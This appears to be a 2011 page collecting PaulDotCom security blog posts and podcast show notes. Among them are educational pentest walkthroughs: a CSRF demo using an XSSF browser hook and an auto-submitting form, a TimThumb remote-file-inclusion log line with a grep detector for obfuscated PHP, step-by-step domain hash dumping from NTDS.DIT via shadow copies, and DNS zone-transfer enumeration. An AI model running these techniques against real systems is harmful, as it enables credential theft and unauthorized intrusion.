A couple of weeks ago I saw someone mention a little script called BozoCrack on Twitter and I decided to check it out. What caught my attention is that BozoCrack simply "cracks" md5 hashes by doing a search on Google for that hash. Once it finds the hash and the text that goes with it, it spits it back out on the screen. Not really cracking of course, but its pretty dang effective.

Here is the description that Juuso Salonen, the author, gave it.

"BozoCrack is a depressingly effective MD5 password hash cracker with almost zero CPU/GPU load. Instead of rainbow tables, dictionaries, or brute force, BozoCrack simply finds the plaintext password. Specifically, it googles the MD5 hash and hopes the plaintext appears somewhere on the first page of results.

It works way better than it ever should."

Here's a quick test run of the script. I did a small list with the following passwords in it.

foobar
password
letmein!
password1234
wtfbbqftw

Save that as md5-list.txt and ran BozoCrack against it. My results came back in a just couple of seconds.


> ruby bozocrack.rb md5-list.txt
Loaded 5 unique hashes
3858f62230ac3c915f300c664312c63f:foobar
5f4dcc3b5aa765d61d8327deb882cf99:password
2a5de0f53b1317f7e36afcdb6b5202a4:letmein!
bdc87b9c894da5168059e00ebffb9077:password1234


I didn't get "wtfbbqftw" this time, but who knows it may show up in future Google searches. This is a dead simple script, a great idea and WAY more effective than it should be.

Here's the link to download it. BozoCrack

Simple Nomad talks "APT", and Chris Pogue talks "Sniper Forensics":

Episode 267 Show Notes

Episode 267 - Simple Nomad, Chris Pogue - Direct Audio Download

Episode Hosts:

Paul Asadoorian, Host of Security Weekly and Stogie Geeks

Darren Wigley, Host of Hack Naked At Nite

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Nite episodes on our Bliptv channel.

In this episode we discuss how hacking is so easy a cheating Tour De France winner can do it, Android AV sucks and the last time I talk about Duqu. Yea! Links for this episode:

Android AV sucks

Last post on Duqu

Steam Hacked

Bikes and Hacking

Video Feeds:

Tomorrow night at 6PM ET, Episode 267 of PaulDotCom Security Weekly will feature music man & APT enthusiast Simple Nomad (a.k.a. Mark Loveless) and a Guest Technical Segment from Chris "beefcake" Pogue on his Sniper Forensics methodology.

Participate in our IRC channel or sit back and enjoy it live via the link below:

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or if you prefer, visit the Episode 267 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand, Darren Wigley, and Mike Perez, Jack Daniel.

Note: Some of the images may be a bit hard to read. Simply, click them to load a full-sized version.



Mention Cross-site Request Forgery, or CSRF and eyes will glaze over. Its just one of those subjects that is mysteriously difficult for most to grasp, though its really not all that complicated.

Briefly, a successful CSRF attack involves tricking a user who has a valid session open within an application (bank, web mail, blog, etc.) to submit a request to that application in which the application happily processes the malicious request as if the client consciously made the request themselves. Because the browser automatically resubmits unexpired cookies by design to domains in its cache, the attack succeeds as the vulnerable application has no way to determine this request was not legitimately made. Clear as mud?

Time for an oversimplified example:
Upon login, your bank issues you a cookie which is stored in your browser for a particular period of time, the expiration of which is set by the application.

The banking application also has some predictable parameters in one (or more) of its functions, let's say the transfer_funds function. This function works like this: when you want to transfer funds from your savings to your checking, the browser request looks like this:

http://mylocalbank/transfer_funds.asp?to_acct=8117&amount=100.00

Simple to see what happening here: transfer 100.00 to account 8117

The attack then flows like this: A malicious individual, we'll call him Ed, spams you a link to the embarrassing celebrity photo of the week. Sure you arrive at the page displaying the latest arrest of some over-privileged twenty-something, but embedded in the page is another gift, arguably much more entertaining, code that calls out to your banking application's vulnerable function:

<script src=http://mylocalbank/transfer_funds.asp?to_acct=1337&amount=10000.00/>

Now if you have an active session, let's say you are currently logged into your bank, or you didn't properly log out, this transfer will complete successfully, but this time you'll send 10K to Evil Ed.

As I mentioned this is a way oversimplified example and there is much taken for granted. For more information, including mitigation techniques, start with OWASP's CSRF page.

As difficult as CSRF can be to explain, it can be just as difficult to demonstrate, especially if the vulnerable request is made with a POST as opposed to a GET.


There are some tools to help with this like Monkeyfist or you can create your own custom forms, but I recently stumbled upon the functionality in the Cross-Site Scripting Framework (XSSF) that helps make demonstrating CSRF and its associated risks a breeze.

In case you don't know, XSSF is a framework that is loaded into the Metasploit Framework. Tim Tomes posted a really nice introduction recently on PDC.

For this demonstration I will be using BT5, MSF, the Burp Suite and Mutillidae.

The scenario: Our victim lives behind a firewall. It has a private IP address that is non-routable and thereby unreachable to the attacker. The victim will however visit our malicious site and execute our code, thereby hooking the client browser.

Note: an active session is required and our application must have predictable parameters.

Our attacker is going to attempt to force any hooked browsers to post a blog entry into the vulnerable blogging application, in this case Mutillidae.

Let's quickly look at some key aspects of Mutillidae.

When first visiting the site you are presented with a cookie (PHPSESSIONID):

Upon successful login we recieve a second cookie (uid):

A normal post to the blog looks like this:

Notice both PHPSESSIONID and uid are passed in the POST request.

Here's what the successful blog post looks like:

Next we fire up MSF and load XSSF:

Once loaded, XSSF starts a web server designed to hook or 'zombify' client browsers. Oversimplified, think of it as command and control for the browser using javascript. Essentially, hooked browsers will at regular intervals check in with the controlling server. The controlling server can then push down additional javascript code designed to redirect the client to other malicious sites hosting exploits or social engineering-type attacks. Nastier is the ability to force the client to act as a proxy, which gives the attacker a virtual tunnel into any networks the victim is connected to. More on that in a future post.

XSSF also has web-based interfaces which provide administration, statistics and logs. View all these URLs with by issuing the command xssf_urls:

Now to hook our victim. To keep this somewhat simple, we'll use the xssf test page to hook our victim browser. Imagine this code is buried within a blog or site offering warez or perhaps the code was delivered via XSS in another or  the same vulnerable application.

The XSSF test page includes the underlying code needed to hook our victims:

<script type="text/javascript" src="http://192.168.0.112:8888/loop?interval=5"></script>

In my case the test page is located at http://192.168.0.112:8888/test.html

Once hooked, let's bounce over to the XSSF control page to view our victim. In my case the control page is located at: http://localhost:8889/gui.html?guipage=main:

Now let's setup our CSRF attack. The module is located within MSF at auxiliary/xssf/public/misc/csrf. Here are the default options:

We'll tweak these options to include the parameters needed to mount our CSRF
attack. Most important are vulnWebsite and params:

Once configured enter exploit -j and the malicious script will be pushed down to the hooked browser. Note any exploit can be pushed down to a single or all browsers.

Here's a quick break down of the attack:

The injected script is checking in at regular intervals for instructions from the server. When the attack is launched the client receives a response to the following call:

GET /ask?location=http://192.168.0.112:8888&id=27&time=1320453148253 HTTP/1.1

In the response is included the following code:

f=XSSF_CREATE_IFRAME('csrf', 0, 0)f.src = XSSF_SERVER + 'myframe.html';document.body.appendChild(f);

This code creates an IFRAME from the source of myframe.html

myframe.html contains the following code to create and submit our CSRF attack:

<form id="f" enctype="application/x-www-form-urlencoded" method='POST' action='http://192.168.0.105/mutillidae/index.php?page=add-to-your-blog.php'> 
<input type="text" name="csrf-token" value="SecurityIsDisabled"><input type="text" name="blog_entry" value="On second thought, ask someone else. I know NOTHING about security."> 
<input type="text" name="add-to-your-blog-php-submit-button" value="Save Blog Entry"></form><script>document.getElementById('f').submit();</script>

Notice there are no cookies being sent in this request. But again, because we have an active session, the browser will send the cookies automatically:

And the resulting blog:

Pretty easy, huh?

I hope this post has made CSRF vulnerabilities just a little easier to understand. I recommend you look into XSSF further as I just scratched the surface of its capabilities. Remember to visit OWASP for effective remediation strategies, such as double-submit cookies and per-page tokens.

Written by Dennis Antunes

Follow me on Twitter! @antunesdennis

Metasploit is changing from using their own SVN server to host their repository to GitHub and by this move to Git as their tool for managing the main repository available to the public for getting access to the Framework source code. This also changes the way commits are done, if any none Rapid7 employee or contractor member of the development team wants to contribute code it will have to be thru GitHub pull request feature. This will allow Rapid7 better control over who commits and the quality of the commits making sure that their commercial products Metasploit Community, Pro and Express do not get affected by a contribution that did not go thru a proper test procedure and quality assurance. In addition the shift from SVN to Git will allow greater flexibility to the Rapid7 team to make modification to the the framework on forks and branches on their own systems allowing them to keep the main repository as stable as possible and changes to be pushed in a less risky manner. This is great business move since it will reduce risk and accelerate development of the base foundation of their products, allowing the team to focus more on the technical an engineering aspects of the projects and less on the over heads of managing code on their machines. In terms of management of community commits the pull requests will centralize the process from Redmine and the emails to msfdev mailing list making it easier for them to get contributions for the Framework. I do have to say I will miss the ability to be able to push my own changes and fixes and will have to rely like everybody else to the fork process and GitHub pull request method like everybody else but in the long run this a better solution for the stability of the code, faster innovation and risk reduction allowing Rapid7 to further advanced the Framework that is base of some of their commercial products.

Now this does changes my workflow for the code I write for use in Metasploit. I do have a GitHub account that I used as my temporary account for plugins and modules, I will be consolidating this one in to one single project in GitHub and making sure it follows the folder structure as in the framework so I can just have it in my machine under ~/.msf4 that way I can test modify and test modules and plugins without the need of putting them in the framework folder it self and move them in to the forked version if I wish to contribute them to Rapid7 if not they will still be accessible for sharing under my GitHub page.

So there are now 2 new ways to use the framework repository depending on your need, If you are only to consume the code in it and do not wish to contribute your code to Rapid7 you just need to have Git on your system and clone the repository. You first start by installing Git

Installing Git

On OS X you only need to install the latest Xcode Tools from the AppStore

On CentOS 6 and latest Fedora Systems you would run as root

yum update
yum install git

On Ubuntu and Debian systems you would run as root

apt-get update
apt-get install git-core

Cloning the Repository

I’m a person who likes having several copies of the Framework to work in, I tend to keep in my home folder on my boxes a folder call dev where I keep all the project repositories I use. So I recommend you start by creating the folder to host the project and its copies if you later decide to fork and work on coding inside the Framework.

mkdir -p ~/dev
cd ~/dev

Once the folder is create you only need to clone the Git repository that is on GitHub

git clone git://github.com/rapid7/metasploit-framework.git

Now you should be able to use and work from inside the metasploit-framework folder created there. To keep you copy updated you only need to run from the folder

git pull

This will fetch the latest changes and merge them together.

Forking the Project

If you are planning on contributing to the project then it is recommended that you fork the project so you can issue pull request from GitHub. To be able to do this you must first have a GitHub account at http://github.com once you have an account there you can navigate to https://github.com/rapid7/metasploit-framework and from there click on the fork button on the page to create a fork under your account

Once it has been forked you can now clone it your development system by running the following command in your dev folder, In the example bellow you will see I amed it msf-fork so I can quickly see this is my forked copy

git clone git@github.com:<your username>/metasploit-framework.git msf-fork

Next I want to be able to update from the main Framework repository so I will set the one managed by Rapid7 as upstream and test updating

git remote add upstream git://github.com/rapid7/metasploit-framework.git
git fetch upstream

Once you have done several commits to the clone in your machine you can push those to the fork on your GitHub account by doing running the following command

git push origin master

Any time the framework is updated and you want to merge those changes in to your forked copy you would run

git fetch upstream
git merge upstream/master

To send a pull request to Rapid7 so as to contribute your code or changes you would follow the GitHub guide that would do a better job than me explaining it in this blog post

http://help.github.com/send-pull-requests/

I also recommend the use of branches so you can have several branches of the fork you have so you can later merge those in to your local clone of the fork and push for latter submitting for pull requests a great guide for this is on Online Git Book http://book.git-scm.com/3_basic_branching_and_merging.html

For further reading on the use of Git I recommend
Pro Git Book (http://progit.org/book/

Git Community Book http://book.git-scm.com/index.html

I hope you find this post useful and look forward to people contributing to the Framework.

In this episode we discuss the Steam attack, botnet takedown and we get a visit from Tiny Elvis.

Links for this episode:

Operation Ghost Click

Steam Hacked?

Charlie Miller doing what he does

Video Feeds:

Episode 265 was a truly epic episode for all of us at PaulDotCom. We helped Hackers for Charity raise money to help people, interviewed several really awesome guests, and released a string of tech segments. You can see all of the video segments from our 12 hour show marathon here:

Episode 266 Show Notes

Direct Download of audio for each segment:

Episode 265 - Johnny Long

Episode 265 -Marcus Ranum

Episode 265 - Ron Gula

Episode 265 - Mark Baggett & Tim Tomes

Episode 265 - Robert Graham

Episode 265 - Pushpin & Mobile Phone Hacking

Episode 265 - Kevin Mitnick

Episode 265 - ESX Password recovery, web directory brute forcing, Metasploit post-exploitation

Episode 265 - Drunken penetration testing and security news

Episode Hosts:

Paul Asadoorian, Host of Security Weekly and Stogie Geeks

Jack Daniel, The Security BSides Guy

Larry Pesce, Host of Hack Naked At Nite

Darren Wigley, Host of Hack Naked At Nite

John Strand, Host of Hack Naked TV

Carlos Perez, Host of PaulDotCom Espanol

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Nite episodes on our Bliptv channel.

In this episode we discuss SSL, again. We also discuss Duku and how DAX is not DAX and how hackers sometimes, cannot tell the difference.

Links for this episode:

Another SSL breach

Hackers attack wrong site

There are SSL security standards?

Microsoft releases Duku Fix tool

Offensive Countermeasures in Orlando

Video Feeds:

Interview with Jeff Moss:

Drunken Security News:

Episode 266 Show Notes

Episode 266 - Jeff Moss - Direct Audio Download

Episode 266 - Drunken Stories - Direct Audio Download

Episode Hosts:

Paul Asadoorian, Host of Security Weekly and Stogie Geeks

Jack Daniel, The Security BSides Guy

Larry Pesce, Host of Hack Naked At Nite

Darren Wigley, Host of Hack Naked At Nite

John Strand, Host of Hack Naked TV

Carlos Perez, Host of PaulDotCom Espanol

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Nite episodes on our Bliptv channel.

I was reading through the show notes and the story about Wordpress sites being compromised due to a timthumb vulnerability jumped right out at me. I recently finished doing some incident response on a number of sites compromised by this one. The vulnerability was initially reported by Mark Maunder, a user of Wordpress and Timthumb. Mark has a pretty solid write up on how he found it and what the issue is on his site. Mark went further and did a rewrite of timthumb to deal with the issue and has gotten that merged into the timthumb code back in early August. So cheers to him for not only spotting the issue, but rewriting it to fixing it too.

To recap his post, the problem is that Timthumb allows you to remotely reference files, resize them and upload them to your site. (Anyone see the possible problem yet? Yay, remote file inclusion!)

Here was Mark's analysis on how the vuln was used.

---

The default configuration of timthumb.php which many themes use allow files to be remotely loaded and resized from the following domains:


$allowedSites = array (
'flickr.com',
'picasa.com',
'blogger.com',
'wordpress.com',
'img.youtube.com',
'upload.wikimedia.org',
'photobucket.com', );


The problem is the way the developer checks which domain he's fetching from. He uses the PHP strpos function and if the domain string appears anywhere in the hostname, he'll allow that file to be fetched.

So if you create a file on a web server like so: http://blogger.com.somebadhackersite.com/badscript.php and tell timthumb.php to fetch it, it merrily fetches the file and puts it in the cache directory ready for execution.

Source Article

---

And that's pretty much what I saw on the sites I was dealing with. The remotely added php files I found did things like send spam and added a web based shell which was then used for other shenanigans.

To find what had been done on the server, I ended up spending lots of quality time with the log files. To look for signs of compromise I used the following command.

grep timthumb.php apace-access.log | grep -v "http:\/\/my.domain.com"


It still is a bit noisy with some other enties, but you quickly start finding log entries that look like this:

XX.XX.XX.XX - - [12/Dec/2011:09:11:45 -0600] "GET /wp-content/themes/awake/lib/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"


What I usually saw after a successful attack was a GET request to test the file that they placed in the cache directory was there and was working. At that point you're owned.

So what next? Well, then your incident response plan takes affect. Chase back what IPs are abusing timthumb.php. What files did they access? Are there any PHP executing out of the cache directory in the theme?

One of the things I noticed was that the attackers were trying to "hide" what they were doing by gzipping the ASCII of their PHP code and then base64 encoding it. They'd then dump that into a PHP file and its contents looked something like this:

eval(gzinflate(base64_decode('BLOB OF ASCII')));


It makes it look very obscure at first glance, but fairly screams that something is wrong here. So one way to help chase down things like this is to this handy little command.

egrep -r "eval\(gzinflate\(base64_de" . --include=*.php


Basically a recursive grep that only opens up PHP files to look for our evil code. It doesn't find everything, but I still found it very useful in this case.

Now for a few things to do to help fix the issue. If you can remove TimThumb the site, do it. I don't like the idea of using a script which is designed to pull files from remote sites. If you can't get away with removing it, then upgrade to the latest verstion of timthumb. Then you can disable the functionality which allows using remote files and configure your cache directory to never allow or execute PHP files.

Interview with Kevin Mitnick:

Episode 265 Show Notes

Episode 265 - Kevin Mitnick - Direct Audio Download

Episode Hosts:

Paul Asadoorian

Jack Daniel

Larry Pesce

John Strand

Darren Wigley

Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.

UPDATE: See http://pauldotcom.com/2011/12/safely-dumping-hashes-now-avai.html for updated information.

Recently, Mark Baggett and I presented material on some research we've been conducting for several months in a talk called "Lurking in the Shadows". The basis of the talk and the purpose for our research is that there are some really cool things you can do with Volume Shadow Copies in modern Windows Operating Systems. Our talk takes the approach of using Shadow Copies for hiding malware on Windows systems, but Mark mentions during the talk how one can access protected system files through Shadow Copies as well.

The day after we first presented "Lurking in the Shadows" at Hack3rCon II, Matt Graeber (@mattifestation) reached out to me and asked if I'd ever tried to take the SAM, SYSTEM hive or NTDS.DIT files from a live system using this technique. At the time, I hadn't. So, I immediately fired up my Windows 7 box, created a Shadow Copy with VSSOwn, and attempted to copy the SAM and SYSTEM hive files directly from the Shadow Copy. To my surprise, the 2 files copied without any non-readable errors! I guess I knew it would be possible, as Mark and I were already beating around this bush, but this meant something bigger. Something huge. Was it now possible to dump the NTDS.DIT and SYSTEM hive files from a LIVE domain controller for offline hash dumping? I quickly promoted one of my 2008 Servers to a DC, psexec'd a meterpreter shell to it and took a shot at the NTDS.DIT file with VSSOwn. The file copied out of the Shadow Copy without issue.

So it appears that Mark and I have uncovered some interesting stuff here. You can access anything that is supposed to be locked down and protected on a Windows system by accessing them through Shadow Copies. I can only imagine how we are going to begin seeing this used in the wild and I'm interested to see what others come up with.

But wait a sec. I still don't have hashes. All I have is the SYSTEM hive and the NTDS.DIT file. What can we do with these? Well, up until recently, nothing for free. No one had built a free, open source tool for parsing NTDS.DIT files and decrypting the hashes. But during my quest to find something, Jeremy Pommerening tweeted a link to this white paper. In brief, a security researcher named Csaba Barta took some existing tools and modified them to parse through the NTDS.DIT file and extract the hashes from it. Awesome! The link is complete! I combined Mark and my technique with Csaba's tools and here is the result:

1. Create a new Shadow Copy.
cscript vssown.vbs /start (optional)
cscript vssown.vbs /create

2. Pull the following files from a shadow copy:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

3. Copy files to BT5R1.

2. Download tools from:
http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip

3. Configure and Make the source code for libesedb from the extracted package.
cd libesedb
chmod +x configure
./configure && make

4. Use esedbdumphash to extract the datatable from ntds.dit.
cd esedbtools
./esedbdumphash ../../ntds.dit

5a. Use dsdump.py to dump the hashes from the datatable using the bootkey from the SYSTEM hive.
cd ../../creddump/
python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable

5b. Use bkhive and samdump2 to dump the hashes from the SAM file using the bootkey from the SYSTEM hive.
bkhive SYSTEM key.txt
samdump2 SAM key.txt

6. Crack the hashes.

Beautiful right? But we're not done yet. Csaba also created a tool called dsdumphistory.py which dumps the PAST hashes of all the users as well. Now you can crack the historical passwords of users and identify patterns in their password history.

python ./dsdumphistory.py ../system ../libesedb/esedbtools/ntds.dit.export/datatable

So what exactly does this mean? No more dangerous LSSAS injection to dump domain hashes and no more drive mounting to access locked and protected system files. This is just plain awesome! Huge props to Csaba Barta for the tools and kick ass white paper, Matt Graeber for the idea (and everything else it seems like recently), and dakykilla for providing the files I needed to test all this stuff. You guys rock!

In this episode we discuss muppets, APT, Hackers Hacking Hackers and yes.. I rhyme for no good reason at all.

Links for this episode:

New Word 0-days

More APT Awareness

Hackers Hacking Hackers

Video Feeds:

This Thursday night at our new recording time of 6PM ET, we have Mr. DefCon himself, Jeff Moss on to discuss his recent appointment at ICANN and a guest tech segment with Jon "digitalbodyguard" McCoy for Episode 266 of PaulDotCom.

Participate in our IRC channel or sit back and enjoy it live via the link below:

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 266 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand, Darren Wigley, and Mike Perez, Jack Daniel.

A seldom used but sometimes useful method of enumerating hosts in a target network is the use of incrementatal zone transfers.

Lets say that target system personnel have foolishly decided to prevent DNS Zone transfers by blocking TCP port 53 instead of configuring a list of servers allowed to do zone transfers on the DNS. Everyone knows that zone transfers occur over TCP port 53 and queries occur over UDP port 53. So blocking TCP port 53 should block zone transfers right? Wrong.

Well first of all, if the targets zone file is less than 512 bytes you can transfer it over UDP using DIG with the +notcp option. (Note: dig on my Mac does a TCP transfer regardless of whether or not I specify +notcp. Dig on BT5 works fine.)

root@bt:~# dig @ns2.targetnameserver.tgt targetdomain.tgt axfr +notcp

If the zone file is larger than 512 bytes the DNS server will only transfer the data over TCP. You may still be able to obtain part of the DNZ zone using an incremental DNS transfer. An incremental DNZ zone transfer will transfer all of the records since a given update "serial number". To get part of a zone file we will need to know what the current DNS serial number is. If the last incremental zone transfer was less than 512 bytes then we might be able to retrieve that data. Then we can decrement our serial number getting more and more zone data until we exceed the 512 byte limit. So the first thing you need is the serial number that the DNS server is currently on. You can get that information by querying the SOA record for the domain.

# dig @ns2.targetDNSserver.tgt targetDomain.tgt SOA

; <<>> DiG 9.7.0-P1 <<>> @ns1.targetDNSserver.tgt targetDomain.tgt SOA
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57117
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;targetDomain.tgt. IN SOA

;; ANSWER SECTION:
targetDomain.tgt. 86400 IN SOA ns1.targetDNSserver.tgt. 2010122201 86400 7200 2592000 86400

The first number after the name of the DNS server (in bold above) is the serial number of the last transfer. Cool. Lets use it to do an incremental zone transfer.

# dig @ns1.targetDNSserver.tgt targetDomain.tgt ixfr=2010122201 +notcp

; <<>> DiG 9.7.0-P1 <<>> @ns1.targetDNSServer.tgt targetDomain.tgt ixfr=2010122201 +notcp
; (1 server found)
;; global options: +cmd
targetDomain.tgt. 86400 IN SOA ns1.targetDNSserver.tgt. 2010122201 86400 7200 2592000 86400
targetDomain.tgt. 86400 IN A 10.10.166.136
....truncated/modified/forged...
targetDomain.tgt. 86400 IN SOA ns1.targetDNSserver.tgt. 2010122201 86400 7200 2592000 86400

;; Query time: 40 msec
;; SERVER: 10.10.125.10#53(10.10.125.10)
;; WHEN: Wed Oct 19 21:14:41 2011
;; MSG SIZE rcvd: 458

Now decrement the serial number and try it again for the last two incremental zone transfers. Then decrement it again for the last 3. Lather, rinse, repeat until the number of records inside the incremental files exceeds 512 bytes. Even if the organization has taken no precautions to block full zone file transfers there may still be useful data inside the incremental zone file transfers. Changes and deletions from zone files can provide information about other software on targets. For example if the target organization decommissioned an old web server but left it in the DMZ to continue to act as an SSH server. The name change of that host might be the clue that we need to abuse the old web services that are still installed on that host.

By default dig will try to use TCP for all AXFR and IXFR operations, but the +notcp option forces it to use UDP if the version of dig you are running supports it.

After pillaging your targets DNS records be sure to list the way they ATTEMPTED to control DNS zone transfers as a finding. Instead of blocking TCP port 53 they should only allow zone transfers to occur with their designated primary, secondary and tertiary DNZ servers.

Tweets - @markbaggett

Join me and Ed Skoudis for SANS 560 Network Penetration Testing and Ethical Hacking vLive ! Starting January 10, 2012 (wow.. 2012 already) CLICK HERE for more information.

Shawn Henry, executive assistant director at the FBI, proposed the idea of a "secure Internet that was separate from the regular public Internet" as a way of protecting critical infrastructure and financial systems.

His reasons for this are:
• Offense is staying well ahead of defense.
• Companies are being told by law enforcement that they are owned all too often.
• Terrorists are interested in online attacks in addition to bombs, guns and the usual fare.
• Groups are offering Hacking as a Service (HaaS. Must have a random acronym) which could help out any technically challenged terrorists who happen to have money.

As I look at that list, I don't have too much of an issue with any of them. I don't know much about terrorists, but the others are fairly well accepted and information about them is widely available.

So how about the proposed solution? A secure and separate Internet. One that no one is anonymous on. That may sound safe, but would it ever happen?

Sure it feels cozy, but does it really make the bad man go away?

Lack of anonymity might help to a point. People act differently when there's a good chance that they'll be held responsible for bad behavior.

A highly secure network? What does that mean in practice? Who is responsible for defining what is highly secure is? I've got my idea of what this would mean, as I'm sure you have yours. In practice, it sounds like it will end up being compliance.

Last there is "a separate Internet". I interpret this as a network that never touches the Internet. Never shares a component or a connection. Didn't we end up with these critical systems connected to the Internet to save money and facilitate access to information? So this would require businesses to reverse their direction and spend a lot of money to do so. Plus with client side attacks so prevalent, would any system really be separate? Someone's got to manage this network and people will want to get data in and out of it. Own someone's desktop and then pivot to the "separate and secure" network.

In the end it sounds nice, but I just don't see it happening. And given how things get implemented, it probably wouldn't end up separate or secure if it were tried.

Part 1 - Interview with Johnny Long:

Part 2 - Interview with Marcus Ranum:

Part 3 - Interview with Ron Gula:

Episode 265 Show Notes

Episode 265 - Johnny Long - Direct Audio Download

Episode 265 - Marcus Ranum - Direct Audio Download (Audio is a little rough on this one, we apologize)

Episode 265 - Ron Gula - Direct Audio Download

Episode Hosts:

Paul Asadoorian

Jack Daniel

Larry Pesce

John Strand

Darren Wigley

Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.